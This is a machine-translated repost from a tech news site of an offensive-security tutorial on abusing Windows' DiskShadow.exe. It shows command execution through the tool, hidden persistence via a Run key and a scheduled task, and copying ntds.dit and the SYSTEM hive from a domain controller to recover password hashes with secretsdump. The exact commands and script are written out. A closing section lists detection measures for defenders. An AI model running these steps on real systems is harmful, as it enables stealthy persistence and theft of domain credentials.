Shulou(Shulou.com)06/02 Report--

This article is about how to use DiskShadow services to achieve kill-free persistence control and active directory database extraction, the editor feels very practical, so share with you to learn, I hope you can get something after reading this article, say no more, follow the editor to have a look.

Introduction to DiskShadow Service

DiskShadow.exe is a command-line tool for managing the Volume Shadow copy Service (Volume shadow copy Service,VSS), while VSS allows you to establish a point in time for data copy on specific volumes in case you later perform data recovery after data loss, and DiskShadow uses an interactive command interpreter similar to DiskRaid or DiskPart. Diskshadow is included in the Windows Server 2008, 2012, and 2016 system versions as the first internal VSS requester for the hardware shadow copy scheme, and Diskshadow enables you to create and manage hardware and software shadow copies. In addition, the DiskShadow feature includes script mode. (refer to the instructions on Microsoft's official website)

VSS services managed by DiskShadow functions require UAC to enhance privileged access, but ordinary users can also use some of these functional commands, so DiskShadow is also a good choice for command execution and kill-free persistence.

DiskShadow executes command

As application features, both interactive command parsers and script modes can support EXEC commands, and both privileged and unprivileged users can invoke commands and batch scripts in interactive mode or script files, such as the following demonstration functions.

Note: the following examples are implemented in the non-privileged / non-administrator account system on the newly installed or updated Windows Server 2016, and all operations depend on the system version configuration. To successfully replicate, please ensure the integrity of the system and application process.

Interactive mode

In the following example, a normal user can call calc.exe in a DiskShadow environment:

Script mode

In the following example, a normal user starts calc.exe and notepad.exe by calling the script file diskshadow.txt:

Diskshadow.exe / s c:\ test\ diskshadow.txt

Just like Vshadow, DiskShadow.exe can generate its own child process, and DiskShadow.exe can continue to run after the child process ends.

Self-starting persistence & exemption from killing

Because DiskShadow is a signed and authenticated file of the Windows system, let's combine some other persistent and kill-free AutoRuns instances to see what can be learned, and we will update the script to create RunKey and task plans in the next example.

Preparation in advance

Since the DiskShadow features we used above are "window response" (for example, a command window pops up), we need to change the script to invoke pass-thru-like operations that execute external commands, and to close the DiskShadow parent process and subsequent attack payload (Payload) in a timely manner. In some cases, the concealment of this technique is not good if the response window takes too long, but if the window is a prompt when the user logs in, it may be ignored by the user directly.

First, let's change the script diskshadow.txt to implement the basic program invocation. In order to achieve command interaction, we must refer to the initial EXEC command form:

EXEC "cmd.exe" / c:\ test\ evil.exe

Next, add the following persistent hidden key value to the registry:

-Run Key Value-

Reg add HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Run / v VSSRun / t REG_EXPAND_SZ / d "diskshadow.exe / s c:\ test\ diskshadow.txt"

-User Level Scheduled Task-

Schtasks / create / sc hourly / tn VSSTask / tr "diskshadow.exe / sc:\ test\ diskshadow.txt"

After that, we can see how it works.

AutoRuns-see the concealment effect from the registry key value

After creating the persistent hidden key value, we can find that our key value is hidden after opening the login column of the system self-startup function. By default, Windows signature verification in this view is not displayed:

But after deselecting the "hide Microsoft project", you can see the self-startup project we defined under AutoRuns:

AutoRuns-look at the covert effect from the mission plan

As with the create registry key value, the task schedule we created is hidden under the default display of the task plan bar:

Also after deselecting the "hide Microsoft project", you can see the self-startup project we defined under AutoRuns:

Extract active directory data

Since DiskShadow itself is a shadow copy management tool, we can take a look at how to extract data from the active directory database ntds.dit under the shadow copy function. NTDS.DIT is a binary file, which is equivalent to the SAM file of the local computer. It is stored in% SystemRoot%\ ntds\ NTDS.DIT, which contains not only Username and HASH, but also OU, Group, and so on.

In the following applications, we assume that the active directory domain controller has been successfully taken control by the attacker and can effectively execute DiskShadow commands in script mode in a privileged user environment. First of all, we need to prepare the script, we will first step on the target disk drive letter that contains the active directory database to understand the drive letter that is not used by the system disk. Here is the content of the script diskshadow.txt:

Set context persistent nowritersadd volume c: alias someAliascreateexpose% someAlias% z:exec "cmd.exe" / c copy z:\ windows\ ntds\ ntds.dit c:\ exfil\ ntds.ditdelete shadows volume% someAlias%reset

In this script, we create a persistent shadow copy for the C disk space, and then set the alias of the system visible drive to Z as a cover to perform a copy operation to achieve sensitive file acquisition. Through the disk loading process, we can determine the copy path of the target file, and we need to copy the target file to the "exfil" directory before the shadow copy is deleted. (DiskShadow Command reference Manual)

Note that we can also copy the target file by specifying the shadow device name / unique identifier, which is more hidden, but still ensure the correctness of the target file label and UUID, as well as the validity of the script, which is more suitable for interactive mode.

The command and final execution effect of DiskShadow are as follows:

Type c:\ diskshadow.txt

Diskshadow.exe / s c:\ diskshadow.txt

Dir c:\ exfil

In addition to extracting active catalog database data, we can also extract registry configuration unit (HIVE) information for the target system:

Reg.exe save hklm\ system c:\ exfil\ system.bak

After the above ntds.dit and system.bak files are successfully extracted from the target system, we can successfully restore the NTLM hash in the file using the script SecretsDump.py:

Secretsdump.py-ntds ntds.dit-system system.bak LOCAL

Comparison of usability between DiskShadow and Vshadow

The functions of DiskShadow.exe and Vshadow.exe are similar, but there are also essential differences in application services, which can be chosen according to the requirements and the actual environment.

Inclusiveness comparison of operating system

DiskShadow.exe has been built into the operating system since Windows Server 2008, while Vshadow.exe is only available in Windows SDK. If Windows SDK is installed in the target system, we can use Vshadow.exe, but in some actual operating system environments, DiskShadow.exe is relatively better.

Comparison of function and practicality

In a normal user environment, we can use some of the features of DiskShadow without privileges. In the Vshadow test scenario I released earlier, Vshadow may be affected by permissions and some features cannot be used properly. In contrast, DiskShadow is more flexible and reliable in the interaction of commands.

Command line application comparison

Vshadow is relatively friendly to the "command line", where DiskShadow requires interactive commands or script files to implement certain functions. Therefore, under some channels with remote control over the target system, such as backdoor, the implementation of the DiskShadow command may be limited, and the way in which files or scripts are created on the target system may be detected. Therefore, in some system environments with high security requirements, the use of Vshadow should be relatively covert and effective.

Self-starting persistence and kill-free comparison

In the Vshadow utilization article I published earlier, I mentioned that Vshadow is verified by Microsoft signed certificate, that is to say, if it is not set to hide Microsoft signature in the self-startup item monitoring bar, it may be found, while DiskShadow is verified by the system certificate and can be hidden to some extent, relatively good.

Comparison of extracting active Directory databases

Assuming that the current extraction operation is invalid (such as the shadow disk name is not what we want), and DiskShadow is only available in script mode, other additional means may be needed to implement AD database extraction. In addition to creating and running script files, logical drives may need to be mapped to the target machine to copy ntds.dit, which has some security risks, in which case Vshadow is handled relatively well.

Summary

Overall, DiskShadow seems to be more pervasive and practical, but Vshadow and other VSS methods are also good. For defense against DiskShadow attacks, blue teams and security managers may consider the following measures:

Monitor the volume shadow copy service VSS, especially random volume shadow creation / deletion and other suspicious behavior involving the active directory database file ntds.dit

Monitor suspicious instances under System Event ID 7036 (Volume Shadow copy Service run event) and calls to the VSSVC.exe process

Monitor the creation behavior of the Diskshadow.exe process and its child processes

Monitor process integrity, and if the Diskshadow.exe process is in a medium integrity state, there may be security risks

Monitor the Diskshadow.exe instance creation event of the service terminal, and the Diskshadow.exe process should not appear in the Windows operating system unless required by the business

Monitor new logical drive mapping events

Implement the application whitelist mechanism to control the operation of the application and prevent the execution of commands in the Diskshadow.exe process.

Do a good job in information security protection and improve employees' safety awareness!

The above is how to use DiskShadow services to achieve kill-free persistence control and active directory database extraction. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.